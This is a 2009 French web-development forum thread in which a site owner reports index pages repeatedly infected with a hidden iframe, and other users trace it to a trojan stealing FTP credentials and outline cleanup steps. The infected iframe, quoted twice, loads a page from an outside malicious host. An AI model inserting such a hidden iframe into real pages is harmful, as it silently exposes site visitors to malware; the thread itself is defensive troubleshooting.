Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1649 connectés 

  FORUM HardWare.fr
  Programmation
  HTML/CSS

  intégration automatique d'une balise < iframe> infectée

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

intégration automatique d'une balise < iframe> infectée

n°1895145
oli1987
Posté le 15-06-2009 à 13:39:07  profilanswer
 

Bonjour,
 
Depuis quelques temps, j'ai des pages qui s'infectent d'elles-mêmes.
 
Cela concerne les pages index.php ou index.html.
 
Sans que je n'envoie mes pages par ftp, ces fameuses pages index sont infectées par une balise <iframe>, qui se situe juste après la balise <body>, qui ressemble à cela :
 

Code :
  1. <iframe src="http://bigtopbrands.cn:8080/index.php" width=197 height=106 style="visibility: hidden"></iframe>


 
Je remarque que la page se modifie dans le ftp sans que je n'y touche ! J'ai beau changer les mots de passe d'accès au serveur sans arrêt, elles sont toujours modifiées plus ou moins rapidement...
 
Que faire ??? Grand merci à qui pourra m'aider ...

Message cité 1 fois
Message édité par benou le 22-08-2009 à 18:09:29
mood
Publicité
Posté le 15-06-2009 à 13:39:07  profilanswer
 

n°1895148
-KristoV-
Posté le 15-06-2009 à 13:51:33  profilanswer
 

As-tu essayé de protéger le fichier en écriture une fois qu'il est posé sur le serveur ?


---------------
Melodix Control vous présente son blog
n°1895158
oli1987
Posté le 15-06-2009 à 14:06:59  profilanswer
 

Non, je n'ai pas essayé ... Comment peut-on faire ça ?

n°1895170
Deamon
Posté le 15-06-2009 à 14:26:59  profilanswer
 

En changeant la valeur du CHMOD.
Si tu utilises un client ftp généralement c'est dans le menu affiché par clic droit sur le fichier.

n°1895312
jagstang
Pa Capona ಠ_ಠ
Posté le 15-06-2009 à 16:30:50  profilanswer
 

N'utilise pas de logiciel de créations de site / client FTP crackés !


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
n°1895504
oli1987
Posté le 16-06-2009 à 09:27:05  profilanswer
 

Non c'est moi qui m'occupe de créer mes propres sites, mais avec cette infection là, j'ai un peu du mal ...

n°1895741
macgawel
Posté le 16-06-2009 à 14:34:58  profilanswer
 

oli1987 a écrit :

Sans que je n'envoie mes pages par ftp, ces fameuses pages index sont infectées par une balise <iframe>, qui se situe juste après la balise <body>
(...)
Je remarque que la page se modifie dans le ftp sans que je n'y touche !

:heink:  
L'iframe "apparaît" quand exactement ?
Tu utilises quoi pour créer tes pages ?

n°1895881
oli1987
Posté le 16-06-2009 à 18:28:04  profilanswer
 

L'iframe apparait sans que je ne sois devant mon pc ! Et sur le serveur, je vois que la page a été modifée dans la nuit ou à une heure durant laquelle je n'étais pas sur le site !
 
J'utilise PSPad pour créer mes pages. Je pars d'un document vide à chaque fois ...

n°1895889
Deamon
Posté le 16-06-2009 à 18:44:56  profilanswer
 

Et par rapport à la remarque de jagstang tu utilises quoi comme client FTP ?

n°1896021
oli1987
Posté le 17-06-2009 à 08:51:31  profilanswer
 

La mjorité du temps, j'utilise WS Ftp Pro ...
 
Et de temps en temps via Internet Explorer si je ne suis pas sur mon ordi.

mood
Publicité
Posté le 17-06-2009 à 08:51:31  profilanswer
 

n°1896028
macgawel
Posté le 17-06-2009 à 09:05:35  profilanswer
 

oli1987 a écrit :

L'iframe apparait sans que je ne sois devant mon pc ! Et sur le serveur, je vois que la page a été modifée dans la nuit ou à une heure durant laquelle je n'étais pas sur le site !
 
J'utilise PSPad pour créer mes pages. Je pars d'un document vide à chaque fois ...


OK, donc c'est un problème sur le serveur si je suis bien...
 
- L'iframe est bien écrite dans la page index (si tu la récupères via FTP tu as bien l'iframe ?)
- Quel hébergeur ?
- Tu as essayé avec une page index vierge ?
- Tu as regardé le .htaccess - si tu y as accès ?
- Tu as vérifié les droits en lecture/ecriture ?
- Rien d'autre pour le moment  :o

n°1896107
jagstang
Pa Capona ಠ_ಠ
Posté le 17-06-2009 à 10:39:14  profilanswer
 

c'est souvent une manie des hébergeur gratuits


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
n°1897789
oli1987
Posté le 22-06-2009 à 18:19:06  profilanswer
 

@macgawel
 
Déjà, merci de tes réponses.
 
L'iframe est bien écrite dans la page index, en effet. J'ai bien l'iframe quand je la récupère
 

Code :
  1. <iframe src="http://bigtopbrands.cn:8080/index.php" width=197 height=106 style="visibility: hidden"></iframe>


Je suis hébergé par Infomaniak (suisse).
 
J'ai bien accès au .htaccess.
 
J'ai vérifié les droits en lecture et écriture. Seul l'utilisateur y a accès. J'ai décoche "groupe".
 
 
Et j'ai encore eu le cas dernièrement ... :S

n°1897856
jagstang
Pa Capona ಠ_ಠ
Posté le 22-06-2009 à 22:28:12  profilanswer
 

vérifie ton fichier avant et après transfert. Regarde aussi la date de dernière modification. ça peut aussi venir de ton browser infecté par un malware. essaie un autre browser ou donne l'url ici


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
n°1897892
oli1987
Posté le 23-06-2009 à 07:00:55  profilanswer
 

La date de modification change quelques heures/jours après transfert, sans que je ne touche à quoi que ce soit ...
 
J'ai beau changer le mot de passe du serveur toutes les semaines ...

n°1897899
oli1987
Posté le 23-06-2009 à 08:00:27  profilanswer
 

Est-ce possible que ca vienne de mon code ?
J'ai un nouveau site depuis hier, et la page index.php est déjà infectée alors qu'il s'agit d'un tout autre serveur !!! Et non, je n'ai pas un dossier sur le web avec les serveurs et mots de passe.
 
Voici le code de la page avant qu'elle ne soit infectée :
 

Code :
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  2.         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  3. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
  4. <head>
  5.   <meta http-equiv="content-language" content="be-FR" />
  6.   <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
  7.   <title>Nutrition-globale.be</title>
  8.   <link href="css/style.css" rel="stylesheet" type="text/css" />
  9.   </head>
  10.   <body>
  11.     <div id="container">
  12.       <div id="header">
  13.         &nbsp;
  14.       </div>
  15.      
  16.       <div id="links">
  17.       Liens
  18.       </div>
  19.      
  20.       <div id="content">
  21.       Site actuellement en construction.
  22.       </div>
  23.      
  24.       <div id="footer">
  25.       Pied de page - Contact - Adresse - Email - Partenaires - Liens - ...
  26.       </div>
  27.      
  28.     </div>
  29.   </body>
  30. </html>


 
L'iframe vient toujours après la balise <body> ... Il me faut vite une solution ...

n°1897911
Top Surf
Posté le 23-06-2009 à 08:39:35  profilanswer
 

Bonjour,
je viens d'être infecté à mon tour  :fou:  
Ce n’est pas un problème de code oli1987.
Moi j'ai 4 sites sur hébergeur gratuit (FREE) et 1 site sur hébergeur payant (1AND1), ils sont tous infectés.
Comme a dit jagstang, il s’agit d'un malware qui cause le problème.
Ce malware récupère le login et mot de passe FTP (dans mon cas sur le logiciel FilleZilla) puis il injecte l'iframe après le body des pages index.
J'ai donc nettoyé le pc avec Malwarebytes.
Supprimé tous les login et mot de passe sur FilleZilla.
et j'ai changé tous les mots de passe des comptes FTP.
Bon courage   ;)
 
http://www.topsurf.fr


Message édité par Top Surf le 23-06-2009 à 08:41:30
n°1899183
ragondin
Un pote ragondin c'est cool
Posté le 25-06-2009 à 14:56:12  profilanswer
 

c'est un virus, j'ai déjà eu ca. EN fait au moment ou tu enregistres, il vérifie que le document contient la balise </body> et rajoute avant l'iframe.
Celui que j'avais pour faire pire est passé sur tout mon DD et à effectué cette manip sur tous mes fichiers HTML.
 
Bon scan


---------------
Pays et country_code traduits : https://www.iso-country-code.com
n°1899342
oli1987
Posté le 26-06-2009 à 10:08:27  profilanswer
 

Merci de vos conseils. Ca me rassure dans le sens ou je ne suis pas le seul a avoir connu cela. J'ai donc scanné l'ordi (malwarebytes, nod, ...). Il y avait quelques intrus, de fait. J'ai changé les mots de passe, et pour l'instant, tout va bien. Je redirai quoi dans quelques jours.
 
Merci à vous !

n°1900450
oli1987
Posté le 30-06-2009 à 09:53:19  profilanswer
 

Rebonjour,
 
Le fichier qui posait (et pose encore) problème se nomme wiaserva.log (c:\documents and settings\user\Application Data\wiaserva.log).
 
Si je le supprime, il fait son retour à chaque redémarrage de pc. Je viens de le supprimer de nouveau, mais ça ne peut pas durer éternellement ...
 
Y a-t-il une solution autre que le formatage ?

n°1900456
Deamon
Posté le 30-06-2009 à 10:06:06  profilanswer
 

As-tu cherché déjà "wiaserva.log" sur Google pour trouver le nom du virus ? Car à mon avis tu ne dois pas être le seul à l'avoir eu.
Mais à mon avis il n'y a pas que ce fichier car un .log je vois pas trop ce qu'il peut faire seul.

 

T'as fait un scan de ton pc avec quel AV ?


Message édité par Deamon le 30-06-2009 à 10:07:50
n°1900485
macgawel
Posté le 30-06-2009 à 11:07:55  profilanswer
 

[:google]  
Une recherche sur le fichier wiaserva.log donne en deuxième résultat le site de Symantec...

n°1900493
oli1987
Posté le 30-06-2009 à 11:14:29  profilanswer
 

J'ai fait un scan avec Nod32, mais rien trouvé ...

n°1900509
macgawel
Posté le 30-06-2009 à 11:34:19  profilanswer
 

En gros :
1. Le troyen se copie en %System%\wbem\grpconv.exe et crée le fichier %UserProfile%\Application Data\wiaserva.log
2. Il supprime les fichiers %System%\grpconv.exe et %System%\dllcache\grpconv.exe
3. Il crée la clé de registre HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"RunGrpConv" = "1"
 
=>
1. Démarrage en mode "sans echec"
2. Suppression de la clé de registre
3. Suppression des fichiers corrompus
4. Récupération du fichier sain (à partir du cd/dvd d'installation).
 
Là encore, il suffit de lire la fiche de Symantec  :ange:  
 
Sinon, tu devrais peut-être ouvrir un topic sur Virus-Spywares...

n°1916895
el_fantome
Posté le 20-08-2009 à 00:45:17  profilanswer
 

Bonjour,
 
Une solution détaillée pour ce problème d'injection iframe:
 
Solution pour le problème d'attaque par injection iframe
 
.
 

n°1917131
jagstang
Pa Capona ಠ_ಠ
Posté le 20-08-2009 à 16:22:51  profilanswer
 

el_fantome a écrit :

Bonjour,

 

Une solution détaillée pour ce problème d'injection iframe:

 

Solution pour le problème d'attaque par injection iframe

 

.

 



SPAM

 

edit : homepage+first post

Message cité 1 fois
Message édité par jagstang le 20-08-2009 à 16:23:54

---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
n°1917186
Harkonnen
Modérateur
Un modo pour les bannir tous
Posté le 20-08-2009 à 22:06:55  profilanswer
 

jagstang a écrit :


SPAM
 
edit : homepage+first post


ok c'est son site, mais l'info qu'il donne est en rapport avec le sujet du topic, et il n'essaie pas de vendre quoi que ce soit [:jagstang]
Objection rejetée votre honneur :o


---------------
J'ai un string dans l'array (Paris Hilton)
n°1917290
jagstang
Pa Capona ಠ_ಠ
Posté le 21-08-2009 à 10:15:47  profilanswer
 

ouais mais c'est plutôt :  
1) je fais un article
2) je cherche comment le faire connaitre
3) je trouve un forum, je m'inscrit et je poste sur ce sujet...
 
c'est limite mais j'accepte la sentence :D


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
mood
Publicité
Posté le   profilanswer
 


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  HTML/CSS

  intégration automatique d'une balise < iframe> infectée

 

Sujets relatifs
Mettre mon livre d'or (php) dans une balise <table>[PHP] Intégration de texte avec sauts de ligne dans une image
Problème iframeRécupérer valeur entre balise XML
Upload automatique d'un fichierIntégration forum phpbb dans un site
Iframe : Height à 100%Intégration office 2003
Intégration de FCKeditor sur DreamweaverIntégration de FCKeditor sur un logiciel web
Plus de sujets relatifs à : intégration automatique d'une balise < iframe> infectée


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR